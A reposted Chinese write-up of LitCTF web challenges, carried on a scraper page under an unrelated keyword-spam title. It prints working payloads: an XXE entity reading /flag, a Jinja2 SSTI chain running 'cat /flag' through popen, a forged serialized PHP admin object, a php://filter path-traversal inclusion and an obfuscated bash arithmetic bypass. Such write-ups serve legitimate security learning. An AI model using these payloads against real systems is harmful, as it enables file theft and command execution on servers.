您的位置:首页 > 汽车 > 时评 > 免费空间说说点赞_深圳vi设计团队_百度竞价优化软件_武汉刚刚发生的新闻

免费空间说说点赞_深圳vi设计团队_百度竞价优化软件_武汉刚刚发生的新闻

2025/1/23 0:55:14 来源:https://blog.csdn.net/2301_80148821/article/details/143291742  浏览:    关键词:免费空间说说点赞_深圳vi设计团队_百度竞价优化软件_武汉刚刚发生的新闻
免费空间说说点赞_深圳vi设计团队_百度竞价优化软件_武汉刚刚发生的新闻

Litctf-web

exx

xxe,

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>

image-20240601200825159

一个…池子

ssti,没有过滤

{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}

image-20240601201013213

SAS - Serializing Authentication System

反序列化

<?phpclass User {public $username="admin";public $password="secure_password";}
$a=new User();
echo base64_encode(serialize($a));?>
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=

image-20240601201340700

浏览器也能套娃?

ssrf

file:///flag

image-20240601201435409

高亮主题(划掉)背景查看器

文件包含伪协议

POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag

根目录下

image-20240601201621346

百万美元的诱惑

rce

/下

?a[]=1&b[]=2&c=2025a

image-20240601201726455

/dollar.php

取反绕过,自增应该也行试了下没过。

$(())为0

$_++也为1也可以应该

${_}=""输出上一次执行结果

( ( ((~ (( ((${_}))))=-1

%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))

image-20240601202154485

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com